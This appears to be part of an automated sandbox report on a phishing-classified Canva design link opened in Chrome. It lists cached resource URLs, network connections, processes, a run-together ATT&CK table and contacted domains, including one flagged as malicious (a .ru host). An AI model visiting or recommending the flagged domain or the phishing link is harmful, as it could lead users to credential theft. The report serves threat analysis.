    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/70.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/71.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/71.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/71.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/72.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/72.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/72.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/75.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/75.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/75.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/76.ttf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/76.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/76.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7D-quadratic.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7D.otf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7D.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7D.woff2)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7E-quadratic.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7E.otf)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7E.woff)
    Source: chromecache_95.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7E.woff2)
    Source: chromecache_108.2.dr, chromecache_158.2.drString found in binary or memory: https://github.com/getsentry/sentry-javascript
    Source: chromecache_123.2.dr, chromecache_100.2.drString found in binary or memory: https://hm.baidu.com
    Source: chromecache_123.2.dr, chromecache_100.2.drString found in binary or memory: https://logx.optimizely.com/v1/events
    Source: chromecache_112.2.dr, chromecache_149.2.dr, chromecache_152.2.drString found in binary or memory: https://pagead2.googlesyndication.com
    Source: chromecache_171.2.dr, chromecache_112.2.dr, chromecache_149.2.dr, chromecache_152.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://player.vimeo.com/video/
    Source: chromecache_149.2.dr, chromecache_152.2.drString found in binary or memory: https://px.ads.linkedin.com/collect/?pid=
    Source: chromecache_103.2.drString found in binary or memory: https://quilljs.com/
    Source: chromecache_149.2.dr, chromecache_152.2.drString found in binary or memory: https://snap.licdn.com/li.lms-analytics/insight.min.js
    Source: chromecache_171.2.dr, chromecache_112.2.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://tally.so/
    Source: chromecache_171.2.dr, chromecache_112.2.dr, chromecache_149.2.dr, chromecache_152.2.drString found in binary or memory: https://td.doubleclick.net
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://vimeo.com/
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://vimeo.com/album/
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://vimeo.com/channels/
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://vimeo.com/groups/
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://vimeo.com/ondemand/
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://wordwall.net/
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://www.canva-dev.com/design/
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://www.canva-staging.com/design/
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://www.canva.com/design/
    Source: chromecache_112.2.dr, chromecache_149.2.dr, chromecache_152.2.drString found in binary or memory: https://www.google.com
    Source: chromecache_171.2.dr, chromecache_112.2.dr, chromecache_149.2.dr, chromecache_152.2.drString found in binary or memory: https://www.googleadservices.com
    Source: chromecache_148.2.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion/804757079/?random=768524798&fst=1734643659644&cv=
    Source: chromecache_152.2.drString found in binary or memory: https://www.googletagmanager.com
    Source: chromecache_123.2.dr, chromecache_100.2.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=$
    Source: chromecache_171.2.dr, chromecache_112.2.drString found in binary or memory: https://www.merchant-center-analytics.goog
    Source: chromecache_149.2.dr, chromecache_152.2.drString found in binary or memory: https://www.redditstatic.com/ads/pixel.js
    Source: chromecache_171.2.dr, chromecache_112.2.drString found in binary or memory: https://www.youtube.com/iframe_api
    Source: chromecache_102.2.dr, chromecache_136.2.drString found in binary or memory: https://youtu.be/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: classification engineClassification label: mal60.phis.win@17/125@70/25
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2028,i,9838712427235616250,10325020197917731917,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2028,i,9838712427235616250,10325020197917731917,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
    Browser Extensions
    1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      static.cloudflareinsights.com
      104.16.79.73
      truefalse
        high
        o13855.ingest.sentry.io
        34.120.195.249
        truefalse
          high
          ad.doubleclick.net
          142.250.181.70
          truefalse
            high
            p.tvpixel.com
            99.83.205.94
            truefalse
              high
              www.canva.com
              104.16.103.112
              truefalse
                high
                adservice.google.com
                172.217.17.34
                truefalse
                  high
                  spdc-global.pbp.gysm.yahoodns.net
                  54.171.122.26
                  truefalse
                    high
                    d1w725hft9421a.cloudfront.net
                    13.226.2.3
                    truefalse
                      high
                      58ts.vomlogsffy.ru
                      172.67.176.26
                      truetrue
                        unknown
                        ct.canva.com
                        216.239.38.21
                        truefalse
                          high
                          googleads.g.doubleclick.net
                          172.217.17.66
                          truefalse
                            high
                            code.jquery.com
                            151.101.194.137
                            truefalse
                              high
                              static.canva.com
                              104.16.102.112
                              truefalse
                                high
                                font-public.canva.com
                                104.16.102.112
                                truefalse
                                  high
                                  sb.scorecardresearch.com
                                  18.161.69.117
                                  truefalse
                                    high
                                    www.google.com
                                    142.250.181.132
                                    truefalse
                                      high
                                      api.ipify.org
                                      172.67.74.152
                                      truefalse
                                        high
                                        sp.analytics.yahoo.com
                                        unknown
                                        unknownfalse
                                          high
                                          cdn.metadata.io
                                          unknown
                                          unknownfalse
                                            high
                                            NameMaliciousAntivirus DetectionReputation
                                            https://static.canva.com/web/4b29606fa142efca.runtime.jsfalse
                                              high
                                              https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015false
                                                high
                                                https://font-public.canva.com/YACgEZ1cb1Q/0/ArimoItalic.fa87472a877e70c5bce22e42be5c.d257a7100844bc3f98c9021168b6249e.woff2false
                                                  high
                                                  https://font-public.canva.com/YAFdJjTk5UU/0/CanvaSans-MediumItalic.2114be9bf82cd092e.e5e43f51d6d7939d8911c861efa5f9b7.woff2false
                                                    high
                                                    https://p.tvpixel.com/i?aid=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&e=pv&p=web&tv=1x1&url=www.canva.com&refr=&uid=undefined&gtmcb=783739181false
                                                      high
                                                      https://static.canva.com/web/18db09b659c42845.jsfalse
                                                        high
                                                        https://static.canva.com/static/images/favicon-1.icofalse
                                                          high
                                                          https://www.canva.com/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                                                            high
                                                            https://static.canva.com/web/ed3781c5c1cc0c75.jsfalse
                                                              high
                                                              https://static.canva.com/web/2c8d424892fc6ce6.ltr.cssfalse
                                                                high
                                                                https://www.canva.com/_ajax/ae/createBatchfalse
                                                                  high
                                                                  https://static.canva.com/web/images/b46630e470f4040eba7033cf2435edce.wofffalse
                                                                    high
